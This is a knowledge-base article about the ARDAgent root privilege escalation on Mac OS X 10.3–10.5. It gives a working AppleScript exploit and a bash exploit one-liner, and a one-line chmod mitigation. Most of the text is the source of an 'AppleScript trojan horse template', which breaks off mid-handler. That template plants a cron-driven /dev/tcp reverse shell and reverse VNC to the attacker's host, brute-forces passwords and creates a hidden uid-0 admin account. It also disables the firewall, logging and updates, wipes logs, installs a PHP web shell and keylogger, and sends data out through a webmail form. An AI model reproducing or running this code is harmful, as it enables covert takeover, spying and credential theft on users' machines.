ARDAgent exploit
From MacShadows KB
The ARDAgent exploit is a root privilege escalation exploit using AppleScript, taking advantage of lax permissions set upon the ARDAgent executable which is installed with Mac OS X 10.3 (when Apple Remote Desktop client has been installed) through Mac OS X 10.5 (both OS X 10.4 and 10.5 include Apple Remote Desktop client.) The ARDAgent vulnerability is currently not patched. Apple Remote Desktop need not be active, nor have ever been active for the exploit to succeed. When ARDAgent is told to 'do shell script' it is loaded even if it was not currently running. The ARDAgent executable is owned by the root user account and is setuid, meaning that it is possible for the ARDAgent process to be owned by root when launched. This is clearly not the intended behavior as it is generally launched as a process owned by the current user. The 'do shell script' command, when passed to ARDAgent will not always succeed nor will it always be run with root privileges. However, repeating the command eventually results in a successful exploit of the vulnerability.
Contents |
Discovery
The discovery of this exploit is accredited to members of the TheSharedForums. Subsequent its initial posting and confirmation in the thread, several members including lokin, callmenames, Oktane, andrewistheshit, and Wawl began a collaborative effort to create proof of concept software exploiting this vulnerability, one of which was the AppleScript Trojan Horse Template a.k.a. ""AppleScript.tht"" or AS.tht as dubbed by security profiteers.
Usage
AppleScript
--This is a comment, comments begin with two consecutive hyphens
--The next part below is a handler a.k.a. a subroutine
on ARDAgentize(command)
try
--Self explanatory?
tell application "ARDAgent" to do shell script command
on error
--Kill ARDAgent if its already running as the user
do shell script "kill $( ps -xcu ${USER} | grep ARDAgent | awk '{ print $2 }' ) ; exit 0"
--restart this handler
ARDAgentize(command)
end try
end ARDAgentize
--This statement runs the handler and passes it the shell command "id"
ARDAgentize("id")
Bash script (Bourne Again Shell): Just paste this next line in Terminal then click back in the Terminal window and press return
function ARDA() { osascript -e 'tell app "ARDAgent" to do shell script "id"' || (kill $(ps -xcu ${USER} | grep ARDAgent | awk '{ print $2 }') ; ARDA ); } ; ARDA
Sample output of either the AppleScript or the shell command line:"uid=0(root) gid=501(angel) egid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)"
The root account which has user ID zero (uid 0) generally has unrestricted access to processes, commands and files.
Solutions
Don't download and run software from untrusted sources and keep in mind that even software from trusted sources can accidentally destroy your data. Back up your data regularly, ideally to media which are not kept connected to the system and are read-only.
For the ARDAgent vulnerability itself, remove the setuid bit from the executables permissions.
Shell command:
sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
You will be prompted for a password. This change will be undone by repairing permissions with Disk Utility or diskutil from the command line.
AppleScript Trojan Horse Template
The script source is shown below.
---------------------------------------------------------------------------
--AppleScript trojan horse template (incomplete, still in progress v0.6 posted)
---------------------------------------------------------------------------
--Written & tested with AppleScript 1.10.7 on Mac OS X 10.4.11 PPC
---------------------------------------------------------------------------
--Variables
--------------------
global masters_email_address, padlock_icon, software_update_icon, be_quiet, OSX_hashes, OSX_version_number_major, OSX_version_number_minor, OSX_version_number_mini, i_am_an_admin, i_have_root_access, my_username, my_password, my_Path, my_POSIX_folder, my_folder, my_name, launch_path, SystemLoginItems, hidden_admin_username, hidden_admin_password, hidden_admin_password_hash, ip_addresses, move_myself, my_resources, all_else_fails, phpshell_path, candidates_file, target_DDNS_username, target_DDNS_password, target_DDNS_id, target_DDNS_update_URL, masters_DDNS_address, accounts_file, debug, masters_netcat_port, masters_VNC_port, hashes_file, secret_file, key1, key2, webmail_command_line, the_message, the_title, webmail_success_response_term
--###############################################--
--########### HEY! You might want to change these? ###########--
--###############################################--
--These are the tr keys for fuxor and defuxor
set key1 to do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""
set key2 to do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""
--The secret file filename
set secret_file to ".howdy"
set the_title to "Howdy"
--The following variables WILL be changed to the values found in the plist file if the plist file exists
--Which means if you change them within this script, delete the plist file
--If you use the plist file, don't bother changing the value in this script
--debug, hidden_admin_password, hidden_admin_username, masters_DDNS_address, masters_email_address, masters_netcat_port, masters_VNC_port, target_DDNS_id, target_DDNS_password, target_DDNS_update_URL, target_DDNS_username, webmail_command_line, webmail_success_response_term
set debug to true
--The name and password to use with the hidden admin account to be created
set hidden_admin_password to "a secret"
set hidden_admin_username to "nobodyd"
--For the reverse_shell
--Enter *your* Dynamic DNS address for the reverse-shell to connect to you
--Don't forget to update your DDNS record with your current IP if your IP is not static
set masters_DDNS_address to "localhost"
--Your email address for the outgoing mail to you
set masters_email_address to "emailname%40emaildomain.com"
--Whether or not to relocate the trojan away from where it was run
set move_myself to true
--Port number for connect-backs, reverse-shell etc.
set masters_netcat_port to "6880"
set masters_VNC_port to "6879"
--For the target's / victim's Dynamic DNS address so that you can get their IP address even if the outgoing email fails
set target_DDNS_id to "DDNS id"
set target_DDNS_password to "DDNS password"
set target_DDNS_username to "" --Leave this blank if you aren't using a DDNS service to track the target computer.
--You may need to adjust this for different DDNS service providers
set target_DDNS_update_URL to "http://www.sitelutions.com/dnsup?user=" & target_DDNS_username & "&pass=" & target_DDNS_password & "&id=" & target_DDNS_id & "&detectip=1"
set webmail_command_line to "curl -d 'hdnSendMail=sendNow&To=<<MASTERS_EMAIL_ADDRESS>>&CC=&BCC=&Subject=<<THE_TITLE>>&Message=<<THE_MESSAGE>>&btnSend=Send' www.employeesuggestions.com/form.asp 2>/dev/null | grep '<<SUCCESS_RESPONSE_TERM>>'"
set webmail_success_response_term to "Your anonymous suggestion has been sent"
--###############################################--
--###### end of the 'HEY! You might want to change these?' stuff ######--
--###############################################--
--You probably shouldn't change these.
set padlock_icon to 2
set software_update_icon to 0
set be_quiet to true
set OSX_hashes to ""
set OSX_version_number_major to do shell script "sw_vers -productVersion | cut -d '.' -f 1"
set OSX_version_number_minor to do shell script "sw_vers -productVersion | cut -d '.' -f 2"
set OSX_version_number_mini to do shell script "sw_vers -productVersion | cut -d '.' -f 3"
set SystemLoginItems to ""
set i_am_an_admin to false
set i_have_root_access to false
set my_username to system attribute "USER"
set my_password to ""
set ip_addresses to ""
set my_Path to POSIX path of (path to me)
set my_POSIX_folder to (do shell script "dirname " & quoted form of my_Path) & "/"
set my_folder to (POSIX file my_POSIX_folder) --unused at present
set my_name to do shell script "basename \"" & my_Path & "\""
copy my_Path to launch_path
set my_resources to my_Path & "Contents/Resources/"
set phpshell_path to my_Path & "Contents/Resources/phpshell-2.1/"
set candidates_file to "/Users/Shared/SC Info/.candidates"
set accounts_file to "/Users/Shared/SC Info/.accounts"
set hashes_file to "/Users/Shared/SC Info/.hashes"
set all_else_fails to false
--Get the padlock icon
try
--You could place a copy of the icns file(s) within your application bundle, then change this path.
--Note that it will not work from Script Editor and will work from your finished app.
set padlock_icon to POSIX file ("/System/Library/CoreServices/SecurityAgent.app/Contents/Resources/Security.icns" as text)
end try
--Get the Software Update icon
try
set software_update_icon to POSIX file ("/System/Library/CoreServices/Software Update.app/Contents/Resources/Software Update.icns" as text)
end try
---------------------------------------------------------------------------
--Handlers
--------------------
on read_my_plist()
--If my plist file exists, read settings from my plist file and use those instead of settings previously set in this script
--If anyone knows of a method for indirect variable assignment in AppleScript, let me know! :)
local tempvar
if debug then log_event("read_my_plist")
if (do shell script "[ -f " & quoted form of my_resources & "com.AStht.config.plist ] && echo 'true' || echo 'false'" as text) is "true" then
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config debug"
if tempvar is "0" then set debug to false
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config hidden_admin_password"
if tempvar is not "" then set hidden_admin_password to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config hidden_admin_username"
if tempvar is not "" then set hidden_admin_username to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_DDNS_address"
if tempvar is not "" then set masters_DDNS_address to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_email_address"
if tempvar is not "" then set masters_email_address to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_netcat_port"
if tempvar is not "" then set masters_netcat_port to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_VNC_port"
if tempvar is not "" then set masters_VNC_port to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_id"
if tempvar is not "" then set target_DDNS_id to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_password"
if tempvar is not "" then set target_DDNS_password to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_update_URL"
if tempvar is not "" then set target_DDNS_update_URL to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_username"
if tempvar is not "" then set target_DDNS_username to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config webmail_success_response_term"
if tempvar is not "" then set webmail_success_response_term to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config webmail_command_line"
if tempvar is not "" then set webmail_command_line to tempvar
else
if debug then log_event("read_my_plist: plist not found")
end if
end read_my_plist
on i_have_a_secret()
--This routine gathers, sorts and uniques data from the various hidden files and creates a new secret_file,
--then copies it to several locations which may be easily accessible.
if debug then log_event("i_have_a_secret")
try
do shell script "cat " & quoted form of secret_file & " " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " | tr '\\r' '\\n' | sort -u > /var/tmp/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "[ -f /var/tmp/" & quoted form of secret_file & "] && mv /var/tmp/" & quoted form of secret_file & " ~/Public/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " ~/Sites/images/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "chmod 777 ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " ~/Sites/images/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
end try
end i_have_a_secret
on log_event(append_this)
local append_this
do shell script ("echo \"$(date '+%y/%m/%d %H:%M:%S'), OS:" & OSX_version_number_major & "." & OSX_version_number_minor & "." & OSX_version_number_mini & ", AS:" & (version of AppleScript as text) & ", " & my_Path & " V:0.5 -- " & append_this & "\" >> /Users/Shared/.AStht.log")
end log_event
on Back_to_masters_VNC()
if debug then log_event("back_to_masters_VNC")
local Rvnc, the_process, crontent
try
do shell script "test -x /Users/Shared/.OSXvnc-server || cp \"" & my_resources & "Vine Server.app/Contents/Resources/OSXvnc-server\" /Users/Shared/.OSXvnc-server"
end try
set Rvnc to "#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
if [ -z \"$( lsof -i:" & masters_VNC_port & " | grep ESTABLISHED | grep OSXvnc )\" ]
then
the_process=$( ps -auxwww | grep -i OSXvnc-server | grep -v grep | tr -s ' ' | cut -d ' ' -f 2 )
[ \"x${the_process}\" != \"x\" ] && kill -9 \"${the_process}\"
fi
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec /Users/Shared/.OSXvnc-server -connectHost ${address} -connectPort " & masters_VNC_port & " &
exit 0"
--Output the shell script to handle the OSXvnc-server reverse connection
do shell script "echo " & quoted form of Rvnc & " > /Users/Shared/.Rvnc; chmod 777 /Users/Shared/.Rvnc"
--Set a crontask to run the script every hour at 15 minutes past the hour
set crontent to ((do shell script "crontab -l 2>/dev/null; exit 0") & return & "15" & tab & "*/1" & tab & "*" & tab & "*" & tab & "*" & tab & "/bin/bash /Users/Shared/.Rvnc 2>/dev/null")
set crontent to do shell script "echo '" & crontent & "' | tr '\\r' '\\n' | sort -rnu > /var/tmp/cronappend"
do shell script "crontab /var/tmp/cronappend"
do shell script "rm /var/tmp/cronappend"
end Back_to_masters_VNC
on brute_user_accounts()
--Attempt to brute-force passwords for the user accounts on this computer. This is not too speedy but if everything is else is done, I have nothing but time.
if debug then log_event("brute_user_accounts")
local the_users, the_passwords, the_username, the_password
set the_users to {do shell script "dscl . -list /Users | while read username; do passwd=$( dscl . -read /Users/${username} passwd | cut -d ' ' -f 2 ); [ \"${passwd}\" != '*' ] && echo ${username}; done; exit 0"}
set the_passwords to {"password" & return & "admin" & return & "1234" & return}
try
set the_passwords to {the_passwords & (do shell script "cat " & quoted form of candidates_file & " 2>/dev/null; exit 0")}
end try
set the_passwords to {do shell script "echo '" & the_passwords & return & the_users & return & return & "' | tr '\\r' '\\n' | sort -u "}
repeat with the_username in the_users
repeat with the_password in the_passwords
try
do shell script "expect -c 'spawn su " & the_username & "' -c 'expect Password: {send " & the_password & "\\n}' -c 'send id\\n' -c 'send exit\\n' -c 'expect eof' | grep uid"
do shell script "echo " & the_username & ":" & the_password & " >> " & quoted form of accounts_file
exit repeat
end try
end repeat
end repeat
end brute_user_accounts
on reverse_shell()
if debug then log_event("reverse_shell")
local Rshell, the_process, crontent
set Rshell to "#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec 6<>/dev/tcp/${address}/" & masters_netcat_port & " || exit 0
id >&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
cat <&6 | while read input
do
$input >&6 2>&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
done
exit 0"
--Output the shell script to handle the bash reverse-shell
do shell script "echo " & quoted form of Rshell & " > /Users/Shared/.Rshell; chmod 777 /Users/Shared/.Rshell"
--Set a crontask to run the script every hour at 5 minutes past the hour
set crontent to ((do shell script "crontab -l 2>/dev/null; exit 0") & return & "5" & tab & "*/1" & tab & "*" & tab & "*" & tab & "*" & tab & "/bin/bash /Users/Shared/.Rshell 2>/dev/null")
set crontent to do shell script "echo '" & crontent & "' | tr '\\r' '\\n' | sort -rnu > /var/tmp/cronappend"
do shell script "crontab /var/tmp/cronappend"
do shell script "rm /var/tmp/cronappend"
end reverse_shell
on its_smoky_in_here_lets_open_ports_in_the_firewall()
--This handler is best run by root (but may disable the firewall in the preference file with only admin access, firewall won't be off until restart.)
if debug then log_event("its_smoky_in_here_lets_open_ports_in_the_firewall")
--A member of the admin group may already have write access to the file without the use of sudo. Try this first.
try
do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall state -bool false"
do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall loggingenabled -int 0"
do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall stealthenabled -int 0"
do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall udpenabled -int 0"
end try
if i_have_root_access then
try
--for ipfw
do shell script "/usr/bin/sudo /sbin/ipfw disable firewall" --stop ipfw if it is running
end try
--Modify the plist files to disable the firewall on startup
--admin access is required, sudo actually isn't but I'll need it if I'm not an admin
try
--FirewallTool complains (in 10.4 at least) if the next four items aren't these exact types
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall state -bool false"
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall loggingenabled -int 0"
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall stealthenabled -int 0"
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall udpenabled -int 0"
--for Leopard 10.5, won't hurt anything on prior systems
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 0"
end try
end if
end its_smoky_in_here_lets_open_ports_in_the_firewall
on throw_another_log_on_the_fire()
if debug then log_event("throw_another_log_on_the_fire")
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--Call nothing_to_see_here to stop logging first.
--Then this handler to clean the logs...
try
--Just delete utmp and wtmp for now, still need to write a cleaning routine
do shell script "/usr/bin/sudo rm /var/run/utmp /var/run/utmpx /var/log/wtmp /var/log/wtmpx 2>/dev/null"
end try
try
do shell script "exec /usr/bin/sudo bash <<< 'for log in /var/log/system.log /var/log/secure.log /var/log/ftp.log /var/log/asl.log /var/log/httpd/access_log /var/log/httpd/error_log /var/log/lastlog /Library/Logs/AppleFileService/AppleFileService*.log /Library/Logs/Console/*/console.log; do [ -f ${log} ] && { sed -e \"/[Ff][Rr][Oo][Mm]/d\" -e \"/client/d\" -e \"/[Ll]og[Kk]ext/d\" -e \"/" & my_username & "/d\" ${log} > ${log}.tmp && mv ${log}.tmp ${log}; }; done' "
end try
end throw_another_log_on_the_fire
on nothing_to_see_here()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if debug then log_event("nothing_to_see_here")
try
--Disable logging
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
--For Tiger & Leopard
do shell script "/usr/bin/sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.syslogd.plist"
else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then
--For Panther and Jaguar
do shell script "/usr/bin/sudo killall syslogd"
else
--for Puma and Cheetah
do shell script "myoutput=`/bin/ps -axww | grep syslogd | grep -v grep | sed -e 's/^ *//' -e 's/ .*//'`; [ -n \"${myoutput}\" ] && /usr/bin/sudo kill \"${myoutput}\""
end if
end try
try
--Stop system accounting
do shell script "/usr/bin/sudo /usr/sbin/accton"
do shell script "/usr/bin/sudo rm /var/account/acct"
end try
try
--Change syslog.conf
do shell script "/usr/bin/sudo mv /etc/syslog.conf /etc/syslog.conf.AStht; /usr/bin/sudo sed -e 's_/var/log/secure.log_/dev/null_' -e 's_/var/log/ftp.log_/dev/null_' /etc/syslog.conf.AStht > /var/tmp/syslog.conf && /usr/bin/sudo mv -f /var/tmp/syslog.conf /etc/syslog.conf && /usr/bin/sudo touch -r /etc/syslog.conf.AStht /etc/syslog.conf 2>/dev/null"
end try
try
--Change logging settings in /Library/Preferences/com.apple.AppleFileServer.plist
do shell script "exec /usr/bin/sudo bash <<< 'cp /Library/Preferences/com.apple.AppleFileServer.plist /Library/Preferences/com.apple.AppleFileServer.plist.AStht; defaults write /Library/Preferences/com.apple.AppleFileServer activityLog -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer activityLogPath -string /dev/null; defaults write /Library/Preferences/com.apple.AppleFileServer errorLogPath -string /dev/null; defaults write /Library/Preferences/com.apple.AppleFileServer admin31GetsSp -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer adminGetsSp -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer allowRootLogin -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer specialAdminPrivs -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer autoRestart -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer loggingAttributes \"<dict><key>logCreateDir</key><false/><key>logCreateFile</key><false/><key>logDelete</key><false/><key>logLogin</key><false/><key>logLogout</key><false/><key>logOpenFork</key><false/></dict>\"'"
end try
end nothing_to_see_here
on install_phpshell()
--This handler is best run by root (but can install to a user home folder without admin or root.)
--PHPshell version 2.1 http://sourceforge.net/projects/phpshell
if debug then log_event("install_phpshell")
if OSX_version_number_minor as number ≥ 1 then
--OS X 10.0 did not include PHP
if i_have_root_access then
--Place the PHPshell folder (unzipped) inside the Resources folder within your script bundle (or inside Script Editor if you aren't saving as an app)
--Hopefully you remembered to add a user such as any of the following to PHPshell's config.php?
--nobodyd = "md5:54889c9:45caff28b8f9340ccb43f9f61d72b2a3"
--nobodyd = "sha1:527faf43:8a60cb4d7d16b6df77ebf01bcd6a8c98c6ab10d9"
--nobodyd = "a secret"
try
--Check if the file /Library/WebServer/Documents/.PS_Store/phpshell.php is already there
--and if not, copy the contents of the PHPShell directory from within my application bundle
--into /Library/WebServer/Documents/.PS_Store/
do shell script "test -f /Library/WebServer/Documents/.PS_Store/phpshell.php || /usr/bin/sudo mkdir -p -m 777 /Library/WebServer/Documents/; /usr/bin/sudo cp -R " & quoted form of phpshell_path & " /Library/WebServer/Documents/.PS_Store/"
end try
try
--Enable PHP4 support in /etc/httpd/httpd.conf
do shell script "/usr/bin/sudo mv -f /etc/httpd/httpd.conf /etc/httpd/httpd.conf.AStht; /usr/bin/sudo sed -e 'sO# *LoadModule php4_module *libexec/httpd/libphp4.soOLoadModule php4_module libexec/httpd/libphp4.soO' -e 'sO# *AddType application/x-httpd-php .phpOAddType application/x-httpd-php .phpO' -e 'sO# *AddType application/x-httpd-php-source .phpsOAddType application/x-httpd-php-source .phpsO' -e 'sO# *AddModule mod_php4.cOAddModule mod_php4.cO' /etc/httpd/httpd.conf.AStht > /var/tmp/httpd.conf && /usr/bin/sudo mv -f /var/tmp/httpd.conf /etc/httpd/httpd.conf && /usr/bin/sudo touch -r /var/tmp/httpd.conf /etc/httpd/httpd.conf 2>/dev/null"
end try
else
--If I don't have root access then I'll install PHPShell into /Library/WebServer/Documents, try ~/Sites
do shell script "test -d ~/Sites/ && { test -f ~/Sites/images/.PS_Store/phpshell.php || mkdir -p ~/Sites/images 2>/dev/null && cp -R " & quoted form of phpshell_path & " ~/Sites/images/.PS_Store/; chgrp -Rf admin ~/Sites/; }"
end if
end if
--You might also want to call enable_webserver()
end install_phpshell
on enable_webserver()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--This enables "Personal Web Sharing" and opens the web sharing ports in the firewall under Mac OS X 10.4 Tiger
if debug then log_event("enable_webserver")
try
--Set "WEBSERVER=-YES-" in /etc/hostconfig
do shell script "/usr/bin/sudo mv -f /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo sed -e 's/WEBSERVER=-NO-/WEBSERVER=-YES-/' /etc/hostconfig.AStht > /var/tmp/hostconfig && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
end try
try
--Check /etc/hostconfig one more time and if "WEBSERVER=-YES-" isn't there, just append it.
do shell script "grep 'WEBSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'WEBSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
end try
try
do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist"
on error
do shell script "/usr/bin/sudo apachectl restart 2>/dev/null; exit 0"
end try
--/System/Library/LaunchDaemons org.apache.httpd.plist for leopard -- includes "SHAuthorizationRight" ?
end enable_webserver
on enable_Personal_File_Sharing()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if debug then log_event("enable_Personal_File_Sharing")
try
--Set "AFPSERVER=-YES-" in /etc/hostconfig
do shell script "/usr/bin/sudo mv -f /etc/hostconfig /etc/hostconfig.AStht2 && /usr/bin/sudo sed -e 's/AFPSERVER=-NO-/AFPSERVER=-YES-/' /etc/hostconfig.AStht2 > /var/tmp/hostconfig && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht2 /etc/hostconfig 2>/dev/null"
end try
try
--Check /etc/hostconfig one more time and if "AFPSERVER=-YES-" isn't there, just append it.
do shell script "grep 'AFPSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'AFPSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht2 /etc/hostconfig 2>/dev/null"
end try
try
do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.AppleFileServer.plist"
on error
do shell script "/usr/bin/sudo /usr/sbin/AppleFileServer 2>/dev/null; exit 0"
end try
end enable_Personal_File_Sharing
on install_and_activate_logKext()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--logKext version 2.2 http://logkext.googlecode.com/files/logKext.pkg.zip
--This version of logKext is only for 10.4 and 10.5 and it is UB
if debug then log_event("install_and_activate_logKext")
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
try
--Place a copy of logKext.pkg (unzipped) inside the Resources folder within your script bundle (or inside Script Editor if you aren't saving as an app)
do shell script "[ -f /Library/Preferences/com.fsb.logKext ] && exit 0; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkext-1.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkext.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextclient.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextdaemon.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextkeygen.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextkeymap.pkg/\""
on error error_message number error_number
if debug then log_event("install_and_activate_logKext:ERROR #" & error_number & " " & error_message)
--logKext wasn't installed, perhaps the path to the logKext package within my application bundle is incorrect?
end try
--Tell Spotlight not to index the files in /Library/Preferences
do shell script "sudo defaults write /.Spotlight-V100/_exclusions EXCLUSIONS -array-add /Library/Preferences"
end if
end install_and_activate_logKext
on there_are_no_osx_viruses_silly_wabbit()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--Tested with an older version of NAVLU. Hmm, not sure about file's write permissions...
if debug then log_event("there_are_no_osx_viruses_silly_wabbit")
try
do shell script "if [ -f '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf' ]; then /usr/bin/sudo sed 's_://_://127.0.0.1/_'' '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf' > /var/tmp/lu.tmp; /usr/bin/sudo mv /var/tmp/lu.tmp '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf'"
end try
--Still to do, newer NAV, Virex, etc.
--Perhaps modify the /etc/hosts file
end there_are_no_osx_viruses_silly_wabbit
on i_like_you_just_as_you_are()
--Disables update checking for the current user ~/Library/Preferences/com.apple.scheduler.plist
if debug then log_event("i_like_you_just_as_you_are")
do shell script "softwareupdate --schedule off 2>/dev/null; exit 0"
end i_like_you_just_as_you_are
on quit
--ignore any user attempts to quit this program
if debug then log_event("quit handler")
end quit
on agent_86_reporting_for_duty_chief()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if debug then log_event("agent_86_reporting_for_duty_chief")
set hidden_admin_password_hash to do shell script "openssl passwd -crypt -salt xx '" & hidden_admin_password & "'"
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
try
--see if our user is already there
do shell script "dscl . -read /Users/" & hidden_admin_username
on error number 71 -- "read invalid path"
--if not, then add our user.
do shell script "/usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UniqueID 0; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' PrimaryGroupID 20; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' NFSHomeDirectory /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UserShell /bin/bash; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' RealName ''; /usr/bin/sudo dscl . -append /Groups/admin GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -append /Groups/wheel GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' authentication_authority 'basic'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' passwd " & hidden_admin_password_hash
end try
else --For Panther and prior
try
--see if our user is already there
do shell script "niutil -readprop . /users/" & hidden_admin_username & " name"
on error number 105 -- niutil can't open directory
--if not, then add our user. niutil should use lowercase "/users/" or it will it create a second one named "/Users/" which won't actually work.
